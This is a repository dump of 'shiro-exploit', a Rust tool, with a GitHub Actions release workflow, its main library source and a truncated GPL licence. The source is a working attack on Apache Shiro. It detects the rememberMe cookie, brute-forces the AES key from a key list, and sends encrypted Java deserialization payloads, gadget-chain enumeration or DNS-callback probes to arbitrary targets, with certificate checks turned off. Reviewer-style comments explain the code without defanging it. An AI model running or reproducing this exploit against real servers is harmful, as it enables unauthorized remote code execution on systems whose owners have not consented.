12 | # 13 | # Reference: 14 | # https://eugene-babichenko.github.io/blog/2020/05/09/github-actions-cross-platform-auto-releases/ 15 | 16 | name: post-release 17 | on: 18 | push: 19 | tags: 20 | - "v*" 21 | 22 | env: 23 | BIN_NAME: "shiro-exploit" 24 | jobs: 25 | create-release: 26 | name: "shiro-exploit" 27 | runs-on: ubuntu-latest 28 | outputs: 29 | upload_url: ${{ steps.release.outputs.upload_url }} 30 | release_version: ${{ env.RELEASE_VERSION }} 31 | steps: 32 | - name: Get the release version from the tag 33 | shell: bash 34 | if: env.RELEASE_VERSION == '' 35 | run: | 36 | # See: https://github.community/t5/GitHub-Actions/How-to-get-just-the-tag-name/m-p/32167/highlight/true#M1027 37 | echo "RELEASE_VERSION=${GITHUB_REF#refs/tags/}" >> $GITHUB_ENV 38 | echo "version is: ${{ env.RELEASE_VERSION }}" 39 | - name: Checkout repository 40 | uses: actions/checkout@v2 41 | with: 42 | fetch-depth: 1 43 | - name: Generate Release Notes 44 | run: | 45 | python3 .github/workflows/release-notes.py --tag ${{ env.RELEASE_VERSION }} --output notes-${{ env.RELEASE_VERSION }}.md 46 | cat notes-${{ env.RELEASE_VERSION }}.md 47 | - name: Create GitHub release 48 | id: release 49 | uses: actions/create-release@v1 50 | env: 51 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 52 | with: 53 | tag_name: ${{ env.RELEASE_VERSION }} 54 | release_name: ${{ env.RELEASE_VERSION }} 55 | body_path: notes-${{ env.RELEASE_VERSION }}.md 56 | build-release: 57 | name: build-release 58 | needs: create-release 59 | strategy: 60 | fail-fast: false 61 | matrix: 62 | build: [ linux, macos, macos_m1, win-msvc ] 63 | include: 64 | - build: linux 65 | os: ubuntu-latest 66 | rust: stable 67 | target: x86_64-unknown-linux-musl 68 | file: shiro-exploit_amd64 69 | - build: macos 70 | os: macos-latest 71 | rust: stable 72 | target: x86_64-apple-darwin 73 | file: shiro-exploit_darwin 74 | - build: macos_m1 75 | os: macos-latest 76 | rust: stable 77 | target: aarch64-apple-darwin 78 | file: 
shiro-exploit_aarch64_darwin
79 | - build: win-msvc
80 | os: windows-latest
81 | rust: stable
82 | target: i686-pc-windows-msvc
83 | file: shiro-exploit.exe
84 | runs-on: ${{ matrix.os }}
85 | steps:
86 | - name: Checkout repository
87 | uses: actions/checkout@v2
88 | with:
89 | fetch-depth: 1
90 | - name: Cache
91 | uses: Swatinem/rust-cache@v1
92 | - name: Install packages (Ubuntu)
93 | if: matrix.os == 'ubuntu-latest'
94 | run: |
95 | sudo apt-get update
96 | sudo apt-get install -y --no-install-recommends xz-utils liblz4-tool libssl-dev musl-tools pkg-config
# The crate version in Cargo.toml is replaced by the build date (here and in the
# Windows/macOS steps below), so the version compiled into the binary is the build
# date while the archive name (see the "Build archive" step) carries the git tag;
# the two cannot be matched up afterwards.
97 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml
98 | - name: Install packages (Windows)
99 | if: matrix.os == 'windows-latest'
100 | shell: bash
101 | run: |
# choco resolves llvm/openssl to whatever version is current at build time, so
# the OpenSSL linked into the Windows binary is not reproducible between runs.
102 | choco install llvm openssl
# `export` only affects this step's shell; the value that reaches later steps is
# the one written to $GITHUB_ENV two lines down, which uses a different date
# format (zero-padded %Y.%m.%d vs. %-Y.%-m.%-d here and in Cargo.toml).
103 | export CARGO_PKG_VERSION=`date +'%-Y.%-m.%-d'`
104 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml
105 | echo "CARGO_PKG_VERSION=`date +'%Y.%m.%d'`" >>$GITHUB_ENV
# NOTE(review): OPENSSL_DIR points at the 64-bit install while the Windows target
# above is i686-pc-windows-msvc — confirm which OpenSSL the 32-bit build links.
106 | echo "OPENSSL_DIR=C:\Program Files\OpenSSL-Win64" >>$GITHUB_ENV
107 | echo "RUSTFLAGS=-C target-feature=+crt-static" >>$GITHUB_ENV
108 | - name: Install packages (Macos)
109 | if: matrix.os == 'macos-latest'
110 | run: |
111 | sed -i -e "s/^version = .*/version = \"`date +'%-Y.%-m.%-d'`\"/" Cargo.toml
112 | - name: Install Rust
113 | uses: actions-rs/toolchain@v1
114 | with:
115 | toolchain: ${{ matrix.rust }}
116 | profile: minimal
117 | override: true
118 | target: ${{ matrix.target }}
119 | - name: Build release binary
120 | run: cargo build --target ${{ matrix.target }} --verbose --release
121 | - name: Build archive
122 | shell: bash
123 | run: |
# Staging directory name = <BIN_NAME>_<git tag>_<target>; README and LICENSE are
# bundled next to the binary.
124 | staging="${{ env.BIN_NAME }}_${{ needs.create-release.outputs.release_version }}_${{ matrix.target }}"
125 | mkdir -p "$staging"
126 | cp {README.md,LICENSE} "$staging/"
127 | if [ "${{ matrix.os }}" = "windows-latest" ]; then
128 | bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}.exe"
129 | cp "$bin_file"
"$staging/" 130 | cd "$staging" 131 | 7z a "../$staging.zip" . 132 | echo "ASSET=$staging.zip" >> $GITHUB_ENV 133 | echo "BIN_FILE=$bin_file" >> $GITHUB_ENV 134 | else 135 | bin_file="target/${{ matrix.target }}/release/${{ env.BIN_NAME }}" 136 | strip "$bin_file" 137 | cp "$bin_file" "$staging/" 138 | tar czf "$staging.tar.gz" -C "$staging" ${{ env.BIN_NAME }} README.md LICENSE 139 | echo "ASSET=$staging.tar.gz" >> $GITHUB_ENV 140 | echo "BIN_FILE=$bin_file" >> $GITHUB_ENV 141 | fi 142 | - name: Upload release archive 143 | uses: actions/upload-release-asset@v1.0.1 144 | env: 145 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 146 | with: 147 | upload_url: ${{ needs.create-release.outputs.upload_url }} 148 | asset_path: ${{ env.ASSET }} 149 | asset_name: ${{ env.ASSET }} 150 | asset_content_type: application/octet-stream 151 | - name: Upload binary to release 152 | uses: svenstaro/upload-release-action@v1-release 153 | with: 154 | repo_token: ${{ secrets.GITHUB_TOKEN }} 155 | file: ${{ env.BIN_FILE }} 156 | asset_name: ${{ matrix.file }} 157 | tag: default 158 | overwrite: true -------------------------------------------------------------------------------- /src/lib.rs: -------------------------------------------------------------------------------- 1 | pub mod cli; 2 | pub mod yso; 3 | 4 | use anyhow::anyhow; 5 | use cli::EmoArgs; 6 | use encoding_rs::{Encoding, UTF_8}; 7 | use mime::Mime; 8 | use once_cell::sync::Lazy; 9 | use openssl::base64::{decode_block, encode_block}; 10 | use openssl::symm::{encrypt, Cipher}; 11 | use prettytable::{color, Attr, Cell, Row, Table}; 12 | use reqwest::header::{HeaderMap, HeaderValue}; 13 | use reqwest::{header, Proxy, Response}; 14 | use reqwest::{Method, Url}; 15 | use select::document::Document; 16 | use select::predicate::Name; 17 | use std::collections::{HashMap, HashSet}; 18 | use std::fs::File; 19 | use std::io; 20 | use std::io::{BufRead, Read}; 21 | use std::path::Path; 22 | use std::sync::Arc; 23 | use 
std::time::Duration;
24 |
/// One fetched HTTP response, reduced to what the rest of the crate inspects.
25 | #[derive(Debug)]
26 | pub struct RawData {
/// Final URL as reported by reqwest for the response.
27 | pub url: Url,
/// Response headers; `SET_COOKIE` is what the Shiro checks look at.
28 | pub headers: HeaderMap,
29 | pub status_code: reqwest::StatusCode,
/// Decoded body, lower-cased by `fetch_raw_data`.
30 | pub text: String,
31 | }
32 |
/// Process-wide CLI arguments, parsed once on first use.
/// (The type parameter — presumably `Lazy<EmoArgs>`, given the closure's return
/// type — was stripped by the page rendering; same for `CIPHERS` below.)
33 | pub static EMO_ARGS: Lazy = Lazy::new(|| -> EmoArgs { EmoArgs::new() });
/// Mode name → AES-128 cipher used when building the rememberMe cookie.
34 | static CIPHERS: Lazy> = Lazy::new(|| -> HashMap<&str, Cipher> {
35 | HashMap::from([
36 | ("CBC", Cipher::aes_128_cbc()),
37 | ("GCM", Cipher::aes_128_gcm()),
38 | ])
39 | });
40 |
41 | /// Sends one request, carrying the Apache Shiro request headers supplied by the caller.
///
/// `headers` is installed as the client's default header set, with a fixed Firefox
/// User-Agent added on top (a stable fingerprint of this tool in server logs).
/// A fresh `Client` is built per call with idle pooling disabled, the timeout from
/// `EMO_ARGS.timeout` (seconds) and the proxy from `EMO_ARGS.proxy`. TLS certificate
/// and hostname verification are disabled, so any certificate is accepted; an
/// intercepting proxy can therefore also rewrite responses unnoticed. The redirect
/// policy line is commented out, so reqwest's default policy applies.
///
/// Returns the `Response`, or the client-build / send error.
42 | async fn send_requests(
43 | url: &Url,
44 | method: Method,
45 | mut headers: HeaderMap,
46 | ) -> anyhow::Result {
47 | let ua = "Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0";
48 | headers.insert(header::USER_AGENT, header::HeaderValue::from_static(ua));
49 | let client = reqwest::Client::builder()
// No idle connections are kept: every call builds its own client and connection.
50 | .pool_max_idle_per_host(0)
// Accept any certificate / hostname. Intended for scanning arbitrary hosts, but it
// also removes the only protection against a MITM altering what is read back.
51 | .danger_accept_invalid_certs(true)
52 | .danger_accept_invalid_hostnames(true)
53 | .default_headers(headers.clone())
54 | // .redirect(reqwest::redirect::Policy::none())
55 | .timeout(Duration::new(EMO_ARGS.timeout, 0));
56 | let config_proxy = EMO_ARGS.proxy.clone();
// The proxy closure ignores the request URL and returns the configured proxy
// (possibly none) for every request.
57 | let proxy_obj = Proxy::custom(move |_| config_proxy.clone());
58 | return Ok(client
59 | .proxy(proxy_obj)
60 | .build()?
61 | .request(method, url.as_ref())
62 | .send()
63 | .await?);
64 | }
65 |
/// Fetches `url_str` with the Shiro probe cookie and returns the first successful response.
///
/// When `url_str` carries no scheme, `https://` is tried first and then `http://`;
/// when it already has one, both loop iterations request the identical URL, which
/// amounts to a single retry. A URL that fails to parse aborts immediately via `?`
/// without trying the other scheme. The probe cookie
/// `rememberMe=admin;rememberMe-K=admin` is fixed, which makes it a reliable log
/// signature of this probe; `ShiroVerify::new` then looks for `=deleteMe` in the
/// response's Set-Cookie. Transport and decoding failures are swallowed and the
/// next scheme is tried; if nothing succeeds the result is `Err("HTTP ERR")`.
66 | pub async fn index_fetch(url_str: &str, method: Method) -> anyhow::Result> {
67 | let schemes: [&str; 2] = ["https://", "http://"];
68 | for scheme in schemes {
69 | // (The original comment here, "maximum number of redirect hops", is stale: this loop walks the scheme prefixes.)
70 | let mut full_url = url_str.to_string();
71 | if !url_str.to_lowercase().starts_with("http://")
72 | && !url_str.to_lowercase().starts_with("https://")
73 | {
74 | full_url = format!("{}{}", scheme, url_str);
75 | }
76 | let url = Url::parse(&full_url)?;
77 | let mut headers = header::HeaderMap::new();
78 | headers.insert(
79 | header::COOKIE,
80 | header::HeaderValue::from_static("rememberMe=admin;rememberMe-K=admin"),
81 | );
82 | if let Ok(res) = send_requests(&url, method.clone(), headers).await {
83 | if let Ok(raw_data) = fetch_raw_data(res).await {
84 | return Ok(raw_data);
85 | };
86 | };
87 | }
88 | Err(anyhow!("HTTP ERR"))
89 | }
90 |
/// Reads a `Response` into a shared `RawData`.
///
/// A body read failure yields an empty body (`unwrap_or_default`) rather than an
/// error, so callers cannot tell "empty page" from "read failed". The body is
/// decoded via `get_default_encoding` and stored lower-cased.
91 | async fn fetch_raw_data(res: Response) -> anyhow::Result> {
92 | let status_code = res.status();
93 | let headers = res.headers().clone();
94 | let base_url = res.url().clone();
95 | let text_byte = res.bytes().await.unwrap_or_default();
96 | let (text, _) = get_default_encoding(&text_byte, headers.clone());
97 | // (The original comment here, "match the next-hop URL in headers and body", is stale: nothing below looks for a next hop.)
98 | let raw_data = Arc::new(RawData {
99 | url: base_url,
100 | headers,
101 | status_code,
102 | text: text.to_lowercase(),
103 | });
104 | Ok(raw_data)
105 | }
106 |
107 | /// Determines the body encoding and decodes `byte` with it.
///
/// Candidate encodings, in order: the `charset` parameter of the Content-Type
/// header, then the `<meta charset>` found in the (UTF-8-decoded) HTML, then strict
/// UTF-8, then lossy UTF-8. Returns `(text, lossy)`: the flag is `false` whenever a
/// decode succeeded without errors and `true` only on the final lossy fallback —
/// i.e. it signals *failure*, the opposite of what the original comment
/// ("whether decoding succeeded") suggested.
108 | fn get_default_encoding(byte: &[u8], headers: header::HeaderMap) -> (String, bool) {
109 | let (html, _, _) = UTF_8.decode(byte);
110 | let default_encoding = get_charset_from_html(&html);
111 | let content_type = headers
112 | .get(header::CONTENT_TYPE)
113 | .and_then(|value| value.to_str().ok())
114 | .and_then(|value| value.parse::().ok());
115 | let header_encoding = content_type
116 | .as_ref()
117 | .and_then(|mime| mime.get_param("charset").map(|charset| charset.as_str()))
// Falls back to the HTML charset, in which case both loop candidates below are identical.
118 | .unwrap_or(&default_encoding);
119 |
for encoding_name in &[header_encoding, &default_encoding] {
// Unknown encoding labels fall back to UTF-8 rather than being skipped.
120 | let encoding = Encoding::for_label(encoding_name.as_bytes()).unwrap_or(UTF_8);
121 | let (text, _, is_errors) = encoding.decode(byte);
122 | if !is_errors {
123 | return (text.to_string(), false);
124 | }
125 | }
126 | if let Ok(text) = String::from_utf8(byte.to_vec()) {
127 | return (text, false);
128 | }
// Lossy fallback: invalid sequences become U+FFFD and the flag reports it.
129 | return (String::from_utf8_lossy(byte).to_string(), true);
130 | }
131 |
132 | /// reqwest only takes the encoding from the response headers; extract it from the HTML as well.
///
/// Returns the lower-cased `charset` attribute of the first `<meta>` element that
/// has one, or `"utf-8"` when none does.
133 | fn get_charset_from_html(text: &str) -> String {
134 | for metas in Document::from(text).find(Name("meta")) {
135 | if let Some(charset) = metas.attr("charset") {
136 | return charset.to_lowercase();
137 | }
138 | }
139 | String::from("utf-8")
140 | }
141 |
/// Builds a `Cookie: rememberMe=<base64(iv || ciphertext)>` header for `data`.
///
/// `key` is the base64-encoded AES-128 key; the IV is the 16 bytes of a fresh UUIDv4
/// (122 random bits, the version/variant bits are fixed). Every failure is silent:
/// an undecodable `key` becomes an empty key (`unwrap_or_default`), `encrypt` then
/// fails on the wrong key length and the ciphertext is dropped, so the cookie
/// carries only the IV and the request still goes out. Surfacing the decode/encrypt
/// error instead would make a mistyped key visible to the user.
142 | pub fn make_remember_me(key: &str, cipher: Cipher, data: &[u8]) -> HeaderMap {
143 | let mut iv = uuid::Uuid::new_v4().as_bytes().to_vec();
144 | let key = decode_block(key).unwrap_or_default();
145 | let ciphertext = encrypt(cipher, &key, Some(&iv), data);
146 | iv.extend(ciphertext.unwrap_or_default());
147 | let cookie = format!("rememberMe={}", encode_block(&iv));
148 | let mut headers = HeaderMap::new();
149 | headers.insert(
150 | header::COOKIE,
// base64 output is always a valid header value, so the empty fallback should be unreachable.
151 | HeaderValue::from_str(&cookie).unwrap_or(header::HeaderValue::from_static("")),
152 | );
153 | headers
154 | }
155 |
156 | /// Shiro detection and key brute-force state for a single target.
///
/// `target` is the final URL that answered; `verify` records whether the response
/// carried a `=deleteMe` Set-Cookie; `method` is the HTTP method that got that
/// answer; `mode`/`key` are filled in by `burst_key`.
157 | #[derive(Debug, Clone)]
158 | pub struct ShiroVerify {
159 | pub target: Option,
160 | verify: bool,
161 | mode: String,
162 | method: Method,
163 | key: Option,
164 | }
165 |
166 | impl ShiroVerify {
/// Probes `target` with GET and then POST via `index_fetch`.
///
/// Returns as soon as a response carries any Set-Cookie header, with `verify` set
/// from that header's value and `method` set to the method that worked. Only the
/// first Set-Cookie value is inspected (`HeaderMap::get`), so a `=deleteMe` cookie
/// that is not the first one is missed.
167 | pub async fn new(target: String) -> Self {
168 | let mut sv = ShiroVerify {
169 | target: None,
170 | verify: false,
171 | mode: "".to_string(),
172 | method: Method::GET,
173 | key: None,
174 | };
175 | for m in vec![Method::GET, Method::POST] {
176 | sv.method = m.clone();
177 | if let Ok(rd) = index_fetch(&target, m).await {
178 | sv.target = Some(rd.url.clone());
179 | if let Some(cookie) =
rd.headers.get(header::SET_COOKIE) {
180 | sv.verify = cookie.to_str().unwrap_or_default().contains("=deleteMe");
181 | return sv;
182 | }
183 | }
184 | }
185 | sv
186 | }
/// Tries every candidate key against the target and records the first one that is accepted.
///
/// Candidates are `EMO_ARGS.key` plus, if `EMO_ARGS.keys` names a file, one key per
/// line of it. Nothing is sent unless `new` found a target and `verify` is set. For
/// each cipher mode (restricted to `EMO_ARGS.mode` when given) and each key, the
/// `shiro_spc` payload is encrypted into the cookie and the first Set-Cookie of the
/// reply is inspected. A key counts as correct when that cookie does not contain
/// `=deleteMe` — or when the reply has no Set-Cookie at all, which also matches
/// error pages, WAF blocks and anything else that sets no cookie, so a "found" key
/// can be a false positive. Iteration order over the `HashMap`/`HashSet` is
/// unspecified, so which of several matching (mode, key) pairs wins may vary.
187 | pub async fn burst_key(&mut self) {
188 | let mut keys = HashSet::new();
189 | keys.insert(EMO_ARGS.key.clone());
190 | if let Some(file_path) = &EMO_ARGS.keys {
191 | keys.extend(read_file_to_target(file_path));
192 | }
193 | if self.target.is_none() || !self.verify {
194 | return;
195 | }
196 | let target = self.target.as_ref().unwrap();
197 | let shiro_spc = yso::get_payload("shiro_spc");
198 | for (mode, cipher) in CIPHERS.clone().into_iter() {
199 | if let Some(m) = &EMO_ARGS.mode {
200 | if mode != m {
201 | continue;
202 | }
203 | }
204 |
205 | for key in &keys {
206 | let headers = make_remember_me(key, cipher, &shiro_spc);
207 | if let Ok(res) = send_requests(target, self.method.clone(), headers).await {
208 | if let Ok(raw_data) = fetch_raw_data(res).await {
209 | let cookie = raw_data.headers.get(header::SET_COOKIE);
210 | match cookie {
211 | Some(c) => {
212 | if !c.to_str().unwrap_or_default().contains("=deleteMe") {
213 | self.key = Some(key.to_string());
214 | self.mode = mode.to_string();
215 | return;
216 | }
217 | }
// No Set-Cookie at all is treated as success — see the doc comment above.
218 | None => {
219 | self.key = Some(key.to_string());
220 | self.mode = mode.to_string();
221 | return;
222 | }
223 | };
224 | };
225 | };
226 | }
227 | }
228 | }
/// Sends a single request whose rememberMe cookie is built by `ser_to_header`.
///
/// Requires a successful `burst_key` (`mode` non-empty) and `verify`. The response
/// is discarded, so success or failure of the request is not reported to the caller.
229 | pub async fn exploit(&mut self) {
230 | if self.mode.is_empty() || !self.verify {
231 | return;
232 | }
233 | let key = self.key.clone().unwrap_or_default();
234 | if let Some(cipher) = CIPHERS.get(self.mode.as_str()) {
235 | if let Some(target) = self.target.clone() {
236 | let headers = ser_to_header(&target, key, cipher);
237 | let _ = send_requests(&target, self.method.clone(), headers).await;
238 | }
239 | }
240 | }
/// Sends one request per entry of `yso::COMMAND_PAYLOAD_MAP`, each carrying the
/// payload from `yso::get_enum_chain_payload(p, target)`; responses are discarded.
/// Same preconditions as `exploit`.
241 | pub async fn enum_chain(&mut self) {
242 | if self.mode.is_empty() || !self.verify {
243 | return;
244 | }
245 | let key = self.key.clone().unwrap_or_default();
246 |
if let Some(cipher) = CIPHERS.get(self.mode.as_str()) {
247 | if let Some(target) = self.target.clone() {
248 | for (p, _) in yso::COMMAND_PAYLOAD_MAP.clone().into_iter() {
249 | let headers =
250 | make_remember_me(&key, *cipher, &yso::get_enum_chain_payload(p, &target));
251 | let _ = send_requests(&target, self.method.clone(), headers).await;
252 | }
253 | }
254 | }
255 | }
256 | }
257 |
/// Chooses the serialized payload for `exploit` and wraps it in a rememberMe cookie.
///
/// Precedence: (1) the file named by `EMO_ARGS.ser`, read whole — if it is missing,
/// unreadable or empty an *empty* `HeaderMap` is returned, i.e. `exploit` then sends
/// a plain request with no cookie and no error is reported; (2) the named payload
/// `EMO_ARGS.payload` from `yso::get_payload`; (3) otherwise a DNS-callback payload
/// for `http://<host>_<port>.<EMO_ARGS.dns>`, built with `ysoserial_rs::get_url_dns`.
258 | fn ser_to_header(target: &Url, key: String, cipher: &Cipher) -> HeaderMap {
259 | let default_header = HeaderMap::new();
260 | if let Some(path) = &EMO_ARGS.ser {
261 | let mut buf = Vec::new();
262 | let file = File::open(path);
263 | if let Ok(mut f) = file {
// Read errors are ignored; whatever was read before the error may remain in `buf`.
264 | f.read_to_end(&mut buf).unwrap_or_default();
265 | }
266 | if buf.is_empty() {
267 | return default_header;
268 | }
269 | let headers = make_remember_me(&key, *cipher, &buf);
270 | return headers;
271 | }
272 | if let Some(p) = &EMO_ARGS.payload {
273 | return make_remember_me(&key, *cipher, &yso::get_payload(p));
274 | }
275 | // Without a ser file, fall back to DNS-based verification.
276 | let u = format!(
277 | "http://{}_{}.{}",
278 | target.host_str().unwrap_or_default(),
279 | target.port_or_known_default().unwrap_or_default(),
280 | EMO_ARGS.dns
281 | );
282 |
283 | make_remember_me(&key, *cipher, &ysoserial_rs::get_url_dns(&u))
284 | }
285 |
/// Prints the results as a table and, when `EMO_ARGS.csv` is set, also writes them as CSV.
///
/// The CSV file is written first; `expect` means an unwritable path panics instead
/// of printing the table. The table is then rebuilt from scratch for stdout (the
/// second loop appears to duplicate the first, differing only in how the key cell
/// is formed) and printed only when it has at least one row.
286 | pub fn print_results_and_save(results: Vec) {
287 | let mut table = Table::new();
288 | let headers = vec![
289 | Cell::new("url"),
290 | Cell::new("method"),
291 | Cell::new("verify"),
292 | Cell::new("mode"),
293 | Cell::new("key"),
294 | ];
295 | table.set_titles(Row::new(headers.clone()));
296 | for res in &results {
// Green when `verify` is set, red otherwise.
297 | let mut verify_color = Attr::ForegroundColor(color::RED);
298 | if res.verify {
299 | verify_color = Attr::ForegroundColor(color::GREEN);
300 | }
301 | let mut t = String::new();
302 | if let Some(target) = res.target.clone() {
303 | t = target.as_str().to_string();
304 | };
305 | let rows = vec![
306 | Cell::new(&t),
307 | Cell::new(res.method.as_str()),
308 |
Cell::new(&res.verify.to_string()).with_style(verify_color),
309 | Cell::new(&res.mode),
310 | Cell::new(res.key.clone().unwrap_or_default().as_str()),
311 | ];
312 | table.add_row(Row::new(rows));
313 | }
314 | if let Some(csv_path) = &EMO_ARGS.csv {
// Panics (rather than returning an error) when the CSV cannot be created or written.
315 | let out = File::create(csv_path).expect("Failed to create file");
316 | table.to_csv(out).expect("Failed to save file");
317 | }
// Second table, built identically, for stdout — appears to duplicate the one above.
318 | let mut table = Table::new();
319 | table.set_titles(Row::new(headers));
320 | for res in &results {
321 | let mut verify_color = Attr::ForegroundColor(color::RED);
322 | if res.verify {
323 | verify_color = Attr::ForegroundColor(color::GREEN);
324 | }
325 | let mut t = String::new();
326 | if let Some(target) = res.target.clone() {
327 | t = target.as_str().to_string();
328 | };
329 | let rows = vec![
330 | Cell::new(&t),
331 | Cell::new(res.method.as_str()),
332 | Cell::new(&res.verify.to_string()).with_style(verify_color),
333 | Cell::new(&res.mode),
334 | Cell::new(&res.key.clone().unwrap_or_default()),
335 | ];
336 | table.add_row(Row::new(rows));
337 | }
338 | if !table.is_empty() {
339 | table.printstd();
340 | }
341 | }
342 |
/// Reads `file_path` into a set of its lines (duplicates collapsed, order lost).
///
/// Despite the name it is also used for the key list in `burst_key`. An unreadable
/// file yields an empty set rather than an error, and unreadable lines are skipped.
343 | pub fn read_file_to_target(file_path: &str) -> HashSet {
344 | if let Ok(lines) = read_lines(file_path) {
345 | let target_list: Vec = lines.filter_map(Result::ok).collect();
346 | return HashSet::from_iter(target_list);
347 | }
348 | HashSet::from_iter([])
349 | }
350 |
/// Opens `filename` and returns a buffered line iterator over it.
351 | fn read_lines

(filename: P) -> io::Result>> 352 | where 353 | P: AsRef, 354 | { 355 | let file = File::open(filename)?; 356 | Ok(io::BufReader::new(file).lines()) 357 | } 358 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. 
Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 
62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 
102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 
133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. 
